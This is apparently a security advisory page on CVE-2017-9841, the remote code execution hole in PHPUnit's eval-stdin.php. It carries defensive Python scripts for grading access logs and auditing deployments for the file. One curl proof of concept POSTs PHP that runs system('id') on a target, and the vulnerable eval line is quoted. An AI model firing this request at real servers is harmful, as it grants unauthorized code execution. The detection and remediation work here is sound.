WAR ROOM

vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php CVE

The requested path refers to CVE-2017-9841, a critical remote code execution (RCE) vulnerability in PHPUnit's eval-stdin.php helper script. The script is a development-time tool that was never meant to be web-reachable, yet it ended up in the web roots of production sites across several PHP ecosystems:

  • Craft CMS: Many shared hosting deployments left PHPUnit inside vendor/.
  • Magento (Adobe Commerce): Older versions required manual removal of the test directory.
  • Symfony & Laravel apps: Developers who ran composer install without --no-dev shipped the dev dependencies, PHPUnit included, to production and exposed the script without realising it.
  • WordPress plugins: Hundreds of premium plugins bundled PHPUnit inside their distribution ZIPs, so the script landed under wp-content/plugins/<plugin>/vendor/ rather than the site's top-level vendor/ directory.

The eval-stdin.php script in PHPUnit (vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php) exists so that the PHPUnit command-line runner can hand PHP source to a child PHP process on standard input. It contains the following code:

    <?php
    eval('?>' . file_get_contents('php://stdin'));

The '?>' prefix closes the implicit PHP mode so that the input may start with its own opening <?php tag, which is why the known payloads begin that way. When the file is reachable through a web server, under the CGI and FastCGI SAPIs the HTTP request body is what the script reads from php://stdin, so it evaluates whatever PHP the client POSTs. There is no authentication and no check that the script is being run from the command line.
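Every probe or exploit attempt against this script has to request a path ending in eval-stdin.php, which makes access-log detection reliable whatever directory the file was bundled under. The following is an added example, not code from the original page: it parses Apache/nginx Combined Log Format lines (the sample lines are constructed) and grades each request that names the script as a probe, an exploit attempt, or a likely success. The "exploit-succeeded" grade (a 200 to a POST) is a lead to confirm on the host, not proof, because a catch-all front controller can answer 200 for a file that does not exist.

```python
"""Grade CVE-2017-9841 probes and exploitation attempts in web-server access logs.

Added example, not code from the original page. The log format is Apache/nginx
Combined Log Format; the sample lines below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Combined Log Format: ip ident user [ts] "METHOD path PROTO" status size "ref" "ua"
ACCESS_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)

# Match the script wherever it was bundled (vendor/, a plugin's own vendor/, lib/ ...):
# every exploitation attempt has to name it, so the filename is the stable signal.
EVAL_STDIN_RE = re.compile(r'/phpunit/.*/eval-stdin\.php', re.IGNORECASE)


@dataclass
class Hit:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    grade: str  # "probe" | "exploit-attempt" | "exploit-succeeded"


def grade_hit(method: str, status: int) -> str:
    """A GET only checks that the file exists; a POST carries the payload.
    200 to a POST means the script ran the body, or a catch-all front
    controller answered, which is why this is a lead to confirm, not proof."""
    if method not in ("POST", "PUT"):
        return "probe"
    return "exploit-succeeded" if status == 200 else "exploit-attempt"


def classify(line: str) -> Optional[Hit]:
    """Return a Hit for a log line that requests eval-stdin.php, else None."""
    m = ACCESS_LOG_RE.match(line)
    if not m or not EVAL_STDIN_RE.search(m["path"]):
        return None
    status = int(m["status"])
    return Hit(m["ip"], m["ts"], m["method"], m["path"], status,
               grade_hit(m["method"], status))


def scan(lines: Iterable[str]) -> List[Hit]:
    return [h for h in map(classify, lines) if h is not None]


# Constructed sample: one scanner probing the default path (absent), then
# exploiting a plugin-bundled copy; an unrelated request; a second source
# blocked by a WAF rule.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "POST /wp-content/plugins/demo-plugin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 57 "-" "python-requests/2.31"
198.51.100.4 - - [12/Mar/2024:10:16:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2024:10:17:00 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 199 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f"{h.grade:18} {h.ip:15} {h.method:5} {h.status} {h.path}")
```

Feed it a real log with `scan(open("access.log"))`; the 404 probe from the first source is worth keeping as context, since the same address goes on to find a copy under a plugin directory one second later.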

Exploitation takes a single HTTP request. Because the '?>' prefix lets the body start with an opening PHP tag, the proof of concept is just a POST whose body is PHP source:

    curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
      -d "<?php system('id'); ?>"

A 200 response carrying the output of id confirms that the file is present and executing whatever it is sent; once the file is removed the same request gets the server's 404.

Mitigation and Prevention

  • Delete vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php from deployed artifacts, and search the whole document root for other copies: plugin ZIPs and manual copies put the file under paths other than the top-level vendor/.
  • If you deploy via Composer, install without dev dependencies (composer install --no-dev) so PHPUnit never reaches the production tree, or add a post-install-cmd script that deletes the path after every install.

Upgrade to a release that contains the fix (PHPUnit 4.8.28 or 5.6.3 and later), within whatever version constraint composer.json allows:

    composer update phpunit/phpunit
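The three steps above (remove the file, keep dev dependencies out of production, upgrade) can be checked mechanically before and after a deploy. The following audit script is an added example, not part of the page or of PHPUnit/Composer: it walks a deployment root for every copy of eval-stdin.php, reads composer.lock to see which phpunit/phpunit version is pinned and whether it predates the fixed releases (before 4.8.28, or 5.x before 5.6.3, per the CVE record), and can delete the copies it finds. The demo tree it builds is constructed sample data, and a vulnerable pin listed under packages-dev is exactly the case that composer install --no-dev would have kept out of production.

```python
"""Audit a deployment root for CVE-2017-9841 exposure and optionally remove it.

Added example, not code from the original page or from PHPUnit/Composer. It
assumes a Composer-style layout (composer.lock beside vendor/) but searches the
whole tree, because plugin ZIPs and manual copies put eval-stdin.php under
paths other than vendor/phpunit/phpunit/. The demo tree is constructed data.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Affected per the CVE record: PHPUnit before 4.8.28, and 5.x before 5.6.3.
FIRST_FIXED_4 = (4, 8, 28)
FIRST_FIXED_5 = (5, 6, 3)
VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?")


def is_vulnerable_version(version: str) -> Optional[bool]:
    """True/False for a numeric release; None for dev-* or other unparseable pins."""
    m = VERSION_RE.match(version)
    if not m:
        return None
    v = (int(m[1]), int(m[2]), int(m[3] or 0))
    return v < FIRST_FIXED_4 or (5, 0, 0) <= v < FIRST_FIXED_5


def find_eval_stdin(root: Path) -> List[Path]:
    """Every eval-stdin.php that sits somewhere below a phpunit directory."""
    return sorted(p for p in Path(root).rglob("eval-stdin.php")
                  if "phpunit" in p.as_posix().lower())


def locked_phpunit(lock: Path) -> Optional[Tuple[str, str]]:
    """(version, section) for phpunit/phpunit in a composer.lock, or None."""
    data = json.loads(lock.read_text())
    for section in ("packages", "packages-dev"):
        for pkg in data.get(section, []):
            if pkg.get("name") == "phpunit/phpunit":
                return pkg.get("version", ""), section
    return None


def audit(root: Path) -> Dict:
    """Report every script copy plus every lock file that pins phpunit/phpunit."""
    root = Path(root)
    report = {"files": [p.relative_to(root).as_posix() for p in find_eval_stdin(root)],
              "locks": []}
    for lock in sorted(root.rglob("composer.lock")):
        pinned = locked_phpunit(lock)
        if pinned:
            version, section = pinned
            report["locks"].append({
                "lock": lock.relative_to(root).as_posix(),
                "version": version,
                "section": section,  # "packages-dev": --no-dev would have excluded it
                "vulnerable": is_vulnerable_version(version),
            })
    return report


def remediate(root: Path, dry_run: bool = True) -> List[str]:
    """Delete every copy found (the first mitigation above). Returns the paths touched."""
    touched = []
    for p in find_eval_stdin(root):
        if not dry_run:
            p.unlink()
        touched.append(p.as_posix())
    return touched


def build_demo_tree() -> Path:
    """Constructed sample deployment: a top-level vendor/ copy, a plugin-bundled
    copy, and a composer.lock that pins a vulnerable PHPUnit as a dev dependency."""
    root = Path(tempfile.mkdtemp(prefix="cve-2017-9841-"))
    for rel in ("vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
                "wp-content/plugins/demo-plugin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"):
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text("<?php\neval('?>' . file_get_contents('php://stdin'));\n")
    lock = {"packages": [], "packages-dev": [{"name": "phpunit/phpunit", "version": "5.6.2"}]}
    (root / "composer.lock").write_text(json.dumps(lock))
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    print(json.dumps(audit(demo), indent=2))
    print("would remove:", remediate(demo, dry_run=True))
```

Run `audit()` against the unpacked release artifact in CI and fail the build on any non-empty "files" list; `remediate(root, dry_run=False)` is the equivalent of the post-install-cmd delete, with the advantage that it also catches plugin-bundled copies that Composer never installed.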